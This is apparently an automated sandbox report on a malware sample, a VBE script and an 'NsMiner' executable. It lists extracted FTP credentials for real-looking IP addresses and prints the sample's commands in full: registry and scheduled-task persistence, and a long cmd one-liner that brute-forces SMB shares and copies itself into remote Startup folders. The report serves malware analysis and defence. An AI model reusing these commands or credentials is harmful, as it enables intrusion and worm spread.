Analysis
-
max time kernel
358s -
max time network
360s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
11-04-2024 01:54
General
-
Target
gemme ya booty/info.zip
-
Size
1KB
-
MD5
8604e0f263922501f749cfca447b041a
-
SHA1
85c712bdeaceb78e2785e1f63811b0c4a50f952d
-
SHA256
52ec3ba075a507e62bb6e3272fb13b30a8ddc0f62c4ea194311d558b338eb5ed
-
SHA512
496d7a1b8b55d28387dad3f1c43e164bb567259c4cac21dd632ccd450dfbf28d431330c27ea72a5a8034979c325d19ff3fd8a3f7fc12b1122f67ef595630d5b2
Score
10/10
Malware Config
Extracted
Credentials
Protocol: ftp- Host:
43.240.31.217 - Port:
21 - Username:
administrator - Password:
123qwe
Extracted
Credentials
Protocol: ftp- Host:
67.199.66.69 - Port:
21 - Username:
admin - Password:
lol123
Extracted
Credentials
Protocol: ftp- Host:
76.243.14.131 - Port:
21 - Username:
root - Password:
aaaaaa
Extracted
Credentials
Protocol: ftp- Host:
216.172.184.39 - Port:
21 - Username:
administrator - Password:
football
Extracted
Credentials
Protocol: ftp- Host:
121.126.60.78 - Port:
21 - Username:
admin - Password:
abcd1234
Extracted
Credentials
Protocol: ftp- Host:
107.180.9.240 - Port:
21 - Username:
root - Password:
gino
Extracted
Credentials
Protocol: ftp- Host:
80.178.100.183 - Port:
21 - Username:
administrator - Password:
Test123
Extracted
Credentials
Protocol: ftp- Host:
88.30.0.169 - Port:
21 - Username:
root - Password:
iloveyou
Extracted
Credentials
Protocol: ftp- Host:
27.34.151.87 - Port:
21 - Username:
admin - Password:
1234
Extracted
Credentials
Protocol: ftp- Host:
23.225.155.235 - Port:
21 - Username:
root - Password:
000000
Extracted
Credentials
Protocol: ftp- Host:
156.248.38.233 - Port:
21 - Username:
administrator - Password:
1q2w3e4r
Signatures
-
Contacts a large (5131) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 4 IoCs
-
Executes dropped EXE 18 IoCs
-
Loads dropped DLL 36 IoCs
-
VMProtect packed file 10 IoCs
Detects executables packed with VMProtect commercial packer.
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 4 IoCs
-
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Discovers systems in the same network 1 TTPs 8 IoCs
-
Enumerates system info in registry 2 TTPs 64 IoCs
-
Kills process with taskkill 8 IoCs
-
Modifies registry class 1 IoCs
-
NTFS ADS 12 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 52 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of SetWindowsHookEx 17 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\info.zip"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\info\" -spe -an -ai#7zMap16900:118:7zEvent120461⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\gemme ya booty\info\info.vbe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cscript.exe"C:\Windows\System32\cscript.exe" "C:\Users\Admin\AppData\Local\Temp\gemme ya booty\info\info.vbe"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c (echo [ZoneTransfer] & echo ZoneId=0) > C:\Users\Admin\AppData\Local\Temp\tmp2.exe:Zone.Identifier3⤵
- NTFS ADS
-
-
C:\Windows\System32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\tmp2.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- NTFS ADS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ4⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0003⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0004⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1609& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))3⤵
- NTFS ADS
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"4⤵
-
C:\Windows\SysWOW64\net.exenet view5⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"5⤵
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a5⤵
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "4⤵
-
C:\Windows\SysWOW64\net.exenet view \\10.127.0.15⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\find.exefind /i " "5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
